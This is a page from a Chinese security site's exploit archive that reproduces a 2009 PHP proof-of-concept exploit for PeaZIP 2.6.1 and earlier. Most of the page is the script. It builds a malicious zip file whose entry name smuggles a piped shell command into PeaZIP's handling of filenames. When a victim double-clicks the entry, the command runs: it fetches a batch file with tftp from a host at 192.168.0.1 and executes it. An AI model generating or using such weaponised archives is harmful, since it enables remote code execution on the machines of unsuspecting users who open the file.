首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit
来源:http://retrogod.altervista.org/ 作者:pyrokinesis 发布时间:2009-06-08  

<?php
/*
    PeaZIP <= 2.6.1 commpressed filename command injection poc exploit
    by Nine:Situations:Group::pyrokinesis
    site: http://retrogod.altervista.org/
    software site: http://peazip.sourceforge.net/

    tested against: peazip 2.5.1, 2.6.1 for Windows

    a pipe vulnerability exists in the way peazip handles file entries,
    prepare the .zip file, open with it, then double click the compressed text file,
    a cmd shell is launched ...
*/

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;

 function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        if ($timearray['year'] < 0x7bc) {
            $timearray['year']    = 0x7bc;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }

        return (($timearray['year'] - 0x7bc) << 0x19) | ($timearray['mon'] << 0x15) | ($timearray['mday'] << 0x10) |
                ($timearray['hours'] << 0xb) | ($timearray['minutes'] << 0x5) | ($timearray['seconds'] >> 0x1);
    }

    function addFile($data, $name, $time = 0)
    {
        $time= (int) $time;
  $name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');

        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";            // ver needed to extract
        $fr   .= "\x00\x00";            // gen purpose bit flag
        $fr   .= "\x08\x00";            // compression method
        $fr   .= $hexdtime;             // last mod time and date

        // "local file header" segment
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);             // crc32
        $fr      .= pack('V', $c_len);           // compressed filesize
        $fr      .= pack('V', $unc_len);         // uncompressed filesize
        $fr      .= pack('v', strlen($name));    // length of filename
        $fr      .= pack('v', 0);                // extra field length
        $fr      .= $name;

        $fr .= $zdata;
        $this -> datasec[] = $fr;

        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                // version made by
        $cdrec .= "\x14\x00";                // version needed to extract
        $cdrec .= "\x00\x00";                // gen purpose bit flag
        $cdrec .= "\x08\x00";                // compression method
        $cdrec .= $hexdtime;                 // last mod time & date
        $cdrec .= pack('V', $crc);           // crc32
        $cdrec .= pack('V', $c_len);         // compressed filesize
        $cdrec .= pack('V', $unc_len);       // uncompressed filesize
        $cdrec .= pack('v', strlen($name)); // length of filename
        $cdrec .= pack('v', 0);             // extra field length
        $cdrec .= pack('v', 0);             // file comment length
        $cdrec .= pack('v', 0);             // disk number start
        $cdrec .= pack('v', 0);             // internal file attributes
        $cdrec .= pack('V', 32);            // external file attributes - 'archive' bit set

        $cdrec .= pack('V', $this -> old_offset); // relative offset of local header
        $this -> old_offset += strlen($fr);

        $cdrec .= $name;

        $this -> ctrl_dir[] = $cdrec;
    }

    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);

        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"
            pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries overall
            pack('V', strlen($ctrldir)) .           // size of central dir
            pack('V', strlen($data)) .              // offset to start of central dir
            "\x00\x00";                             // .zip file comment length
    }

}

$zipfile = new zipfile();
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
assert(file_put_contents("9sg.zip",$dump_buffer));
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Host Directory PRO 2.1.0 Remot
·Kjtechforce mailman b1 (dest)
·Web Directory PRO (admins.php)
·Online Armor < 3.5.0.12 (OAmon
·OpenSSL < 0.9.8i DTLS ChangeCi
·Joomla Component Seminar 1.28
·Podcast Generator <= 1.2 unaut
·Atomix Virtual Dj Pro 6.0 Stac
·MyCars Automotive (Auth Bypass
·Apple iTunes 8.1.1 (ITMS) Mult
·linux/x86 bindport 8000 & exec
·The Linksys WAG54G2 web manage
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved